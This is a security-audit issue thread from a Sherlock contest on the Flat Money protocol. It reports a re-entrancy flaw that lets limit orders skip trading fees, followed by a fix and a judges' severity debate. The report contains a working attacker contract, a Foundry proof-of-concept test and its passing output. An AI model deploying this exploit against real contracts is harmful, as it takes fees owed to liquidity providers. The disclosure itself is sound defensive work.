sherlock-audit / 2023-12-flatmoney-judging

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juan - A malicious user can bypass limit order trading fees via cross-function re-entrancy #75

Open sherlock-admin opened 8 months ago

sherlock-admin commented 8 months ago



A malicious user can bypass limit order trading fees via cross-function re-entrancy


A malicious user can bypass limit order trading fees via cross-function re-entrancy, since _safeMint makes an external call to the user before updating state.

Vulnerability Detail

In the LeverageModule contract, the _mint function calls _safeMint, which makes an external call to the receiver of the NFT (the to address).

LeverageModule::_mint() ```javascript function _mint(address _to) internal returns (uint256 _tokenId) { _tokenId = tokenIdNext; _safeMint(_to, tokenIdNext); tokenIdNext += 1; } ```

Only after this external call, vault.setPosition() is called to create the new position in the vault's storage mapping. This means that an attacker can gain control of the execution while the state of _positions[_tokenId] in FlatcoinVault is not up-to-date.

LeverageModule::executeOpen() ```javascript _newTokenId = _mint(_account); // Here, an attack gains control of execution vault.setPosition( // This updates _positions[_tokenId] in the FlatcoinVault, but after the external call FlatcoinStructs.Position({ lastPrice: entryPrice, marginDeposited: announcedOpen.margin, additionalSize: announcedOpen.additionalSize, entryCumulativeFunding: vault.cumulativeFundingRate() }), _newTokenId ); ``` > Permalink:

This outdated state of _positions[_tokenId] can be exploited by an attacker once the external call has been made. They can re-enter LimitOrder::announceLimitOrder() and provide the tokenId that has just been minted. In that function, the trading fee is calculated as follows:

uint256 tradeFee = ILeverageModule(vault.moduleAddress(FlatcoinModuleKeys._LEVERAGE_MODULE_KEY)).getTradeFee(

However since the position has not been created yet (due to state being updated after an external call), this results in the tradeFee being 0 since vault.getPosition(tokenId).additionalSize returns the default value of a uint256 (0), and tradeFee = fee * size.

Hence, when the limit order is executed, the trading fee (tradeFee) charged to the user will be 0.


A malicious user can bypass the trading fees for a limit order, via cross-function re-entrancy. These trading fees were supposed to be paid to the LPs by increasing stableCollateralTotal, but due to limit orders being able to bypass trading fees (albeit during the same transaction as opening the position), LPs are now less incentivised to provide their liquidity to the protocol.

Code Snippet

Proof of Concept


  1. A user announces opening a leverage position, calling announceLeverageOpen() via a smart contract which implements IERC721Receiver.
  2. Once the keeper executes the order, the contract is called, with the function onERC721Received(address,address,uint256,bytes)
  3. The function calls LimitOrder::announceLimitOrder() to create the desired limit order to close the position. (stop loss, take profit levels)
  4. The contract then returns msg.sig (the function signature of the executing function) to satify the IERC721Receiver's requirement.

To run this proof of concept:

  1. Add 2 files AttackerContract.sol and ReentrancyPoC.t.sol to flatcoin-v1/test/unit in the project's repo.
  2. run forge test --mt test_tradingFeeBypass -vv in the terminal
Attacker Contract ```javascript // SPDX-License-Identifier: SEE LICENSE IN LICENSE pragma solidity 0.8.18; import {OrderHelpers} from "../helpers/OrderHelpers.sol"; import {FlatcoinStructs} from "../../src/libraries/FlatcoinStructs.sol"; import "forge-std/console2.sol"; import {Setup} from "../helpers/Setup.sol"; import {LimitOrder} from "src/LimitOrder.sol"; contract AttackerContract { LimitOrder limitOrderProxy; function setLimitOrderProxy(address limitOrderAddress) external { limitOrderProxy = LimitOrder(limitOrderAddress); } function onERC721Received(address operator, address from, uint256 tokenId, bytes calldata data) external returns(bytes4) { // Do the cross-function re-entrancy limitOrderProxy.announceLimitOrder(tokenId, 750e18, 1250e18); // Return the function signature (required by the standard) return msg.sig; // Note: Also could return `this.onERC721Received.selector` or `bytes4(keccak256("onERC721Received(address,address,uint256,bytes)"))` } } ```
Proof of Concept (Foundry Test) ```javascript // SPDX-License-Identifier: SEE LICENSE IN LICENSE pragma solidity 0.8.18; import {OrderHelpers} from "../helpers/OrderHelpers.sol"; import {FlatcoinStructs} from "../../src/libraries/FlatcoinStructs.sol"; import "forge-std/console2.sol"; import {AttackerContract} from "./AttackerContract.sol"; import {Setup} from "../helpers/Setup.sol"; contract ReentrancyPoC is Setup, OrderHelpers { function test_tradingFeeBypass() public { // Set up and initialize the attacker's contract AttackerContract attackerContract = new AttackerContract(); attackerContract.setLimitOrderProxy(address(limitOrderProxy)); // Deal the exploiter contract with WETH + ETH deal(address(WETH), address(attackerContract), 100_000e18); // Loading account with `token`. deal(address(attackerContract), 100_000e18); // Loading account with native token. uint256 aliceBalanceBefore = WETH.balanceOf(alice); uint256 stableDeposit = 100e18; uint256 collateralPrice = 1000e8; // Alice provides liquidity vm.startPrank(alice); announceAndExecuteDeposit({ traderAccount: alice, keeperAccount: keeper, depositAmount: stableDeposit, oraclePrice: collateralPrice, keeperFeeAmount: 0 }); vm.stopPrank(); // Contract opens position: 10 ETH collateral, 30 ETH additional size (4x leverage) uint256 tokenId = announceAndExecuteLeverageOpen({ traderAccount: address(attackerContract), keeperAccount: keeper, margin: 10e18, additionalSize: 30e18, oraclePrice: collateralPrice, keeperFeeAmount: 0 }); // Get the limit order that has been created by the attacker's contract FlatcoinStructs.Order memory limitOrderCreated = limitOrderProxy.getLimitOrder(tokenId); // Get the order's data FlatcoinStructs.LimitClose memory orderData = abi.decode(limitOrderCreated.orderData, (FlatcoinStructs.LimitClose)); /////////////////////// // POC Assertions // /////////////////////// // Assert that the tradeFee for the limit order is 0 assertEq(orderData.tradeFee, 0); // Assert that the price threshold is 750e18, showing that it is not zero, showing that the orderData is not just returning the default values. assertEq(orderData.priceLowerThreshold, 750e18); /////////////////////// // Other Assertions // /////////////////////// // The following assertions are copied from another test in the test suite- // ERC721 token assertions: { (uint256 buyPrice, ) = oracleModProxy.getPrice(); // Position 0: FlatcoinStructs.Position memory position0 = vaultProxy.getPosition(tokenId); assertEq(position0.lastPrice, buyPrice, "Entry price is not correct"); assertEq(position0.marginDeposited, 10e18, "Margin deposited is not correct"); assertEq(position0.additionalSize, 30e18, "Size is not correct"); assertEq(tokenId, 0, "Token ID is not correct"); } // PnL assertions: { FlatcoinStructs.PositionSummary memory positionSummary0 = leverageModProxy.getPositionSummary(tokenId); uint256 collateralPerShareBefore = stableModProxy.stableCollateralPerShare(); // Check that before the WETH price change, there is no profit or loss change assertEq(positionSummary0.profitLoss, 0, "Pnl for user 0 is not correct"); assertEq( positionSummary0.marginAfterSettlement, 10e18, "Margin after settlement for user 0 is not correct" ); // full margin available } } } ```
Console Output ```powershell Running 1 test for test/unit/ReentrancyPoC.t.sol:ReentrancyPoC [PASS] test_tradingFeeBypass() (gas: 2006498) Logs: tradeFee: 0 Test result: ok. 1 passed; 0 failed; 0 skipped; finished in 8.81ms Ran 1 test suites: 1 tests passed, 0 failed, 0 skipped (1 total tests) ```

Tool used

Manual Review


To fix this specific issue, the following change is sufficient:

-_newTokenId = _mint(_account); 

        lastPrice: entryPrice,
        marginDeposited: announcedOpen.margin,
        additionalSize: announcedOpen.additionalSize,
        entryCumulativeFunding: vault.cumulativeFundingRate()
-   _newTokenId
+   tokenIdNext
+_newTokenId = _mint(_account); 

However there are still more state changes that would occur after the _mint function (potentially yielding other cross-function re-entrancy if the other contracts were changed) so the optimum solution would be to mint the NFT after all state changes have been executed, so the safest solution would be to move _mint all the way to the end of LeverageModule::executeOpen().

Otherwise, if changing this order of operations is undesirable for whatever reason, one can implement the following check within LimitOrder::announceLimitOrder() to ensure that the positions[_tokenId] is not uninitialized:

uint256 tradeFee = ILeverageModule(vault.moduleAddress(FlatcoinModuleKeys._LEVERAGE_MODULE_KEY)).getTradeFee(

+require(additionalSize > 0, "Additional Size of a position cannot be zero");
sherlock-admin commented 7 months ago

1 comment(s) were left on this issue during the judging contest.

takarez commented:

valid: medium finding as there is no profit in doing so; user closed position immediately after opening it; medium(5)

ydspa commented 7 months ago


Fee loss in certain circumstance is a Medium issue

sherlock-admin2 commented 7 months ago


Fee loss in certain circumstance is a Medium issue

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securitygrid commented 7 months ago

The tradeFee of an order may be relatively small, but imagine that the accumulated tradeFee of high-frequency trading or a large number of orders will be small?

r0ck3tzx commented 7 months ago

The severity should be high, as it is easy to create a separate service that could enable the opening of leverage positions with limit orders (stop loss and take profit) at a 0 trade fee, allowing the siphoning of value from the Flat Money protocol at scale.

0xLogos commented 7 months ago


Dup of #212 bcz same root cause: fee must be calculated at execution time of the limit order

sherlock-admin2 commented 7 months ago


Dup of #212 bcz same root cause: fee must be calculated at execution time of the limit order

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r0ck3tzx commented 7 months ago


Dup of #212 bcz same root cause: fee must be calculated at execution time of the limit order

Its not the same root cause, the root cause of this is the update of state setPosition that happens after the minting process that allows hijacking the execution.

xiaoming9090 commented 7 months ago


The impact of this issue is that the LPs will not receive the trade fee. This is similar to other issues where the protocol did not receive their entitled trade fee due to some error and should be categorized as loss of fee OR loss of earning, and thus should be a Medium.

Also, note that the LPs gain/earn when the following event happens:

Statically, the bulk of the LP gain comes from the loss of the long trader in such a long-short prep protocol in the real world. The uncollected trading fee due to certain malicious users opening limit orders only makes up a very small portion of the earnings and does not materially impact the LPs or protocols. Also, this is not a bug that would drain the protocol, directly steal the assets of LPs, or lead to the protocol being insolvent. Thus, this issue should not be High. A risk rating of Medium would be more appropriate in this case.

sherlock-admin2 commented 7 months ago


The impact of this issue is that the LPs will not receive the trade fee. This is similar to other issues where the protocol did not receive their entitled trade fee due to some error and should be categorized as loss of fee OR loss of earning, and thus should be a Medium.

Also, note that the LPs gain/earn when the following event happens:

  • Loss of the long trader. This is because LP is the short side. The loss of a long trader is the gain of a short trader.
  • Open, adjust, close long position - (0.1% fee)
  • Open limit order - (0.1% fee)

Statically, the bulk of the LP gain comes from the loss of the long trader in such a long-short prep protocol in the real world. The uncollected trading fee due to certain malicious users opening limit orders only makes up a very small portion of the earnings and does not materially impact the LPs or protocols. Also, this is not a bug that would drain the protocol, directly steal the assets of LPs, or lead to the protocol being insolvent. Thus, this issue should not be High. A risk rating of Medium would be more appropriate in this case.

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sherlock-admin commented 7 months ago

The protocol team fixed this issue in PR/commit

securitygrid commented 7 months ago

The root cause of reentrancy is that the CEI pattern is not applied, and bypassing tradeFee is just an attack method. This issue is not a Dup of #212. Different roots, different fixes. The tradeFee is given to the short side, which means a loss of funds for them.

nevillehuang commented 7 months ago

Agree, this has separate root causes as #212. I have a similar stance for this issue based on my comment here.

Czar102 commented 7 months ago

I think High severity is appropriate, see

I believe the root causes and fixes are different, so supported by @nevillehuang's expertise, planning not to duplicate these issues.

Planning to reject the escalations and leave the issue as is.

Czar102 commented 7 months ago

Result: High Has duplicates

sherlock-admin2 commented 7 months ago

Escalations have been resolved successfully!

Escalation status:

sherlock-admin4 commented 6 months ago

The Lead Senior Watson signed off on the fix.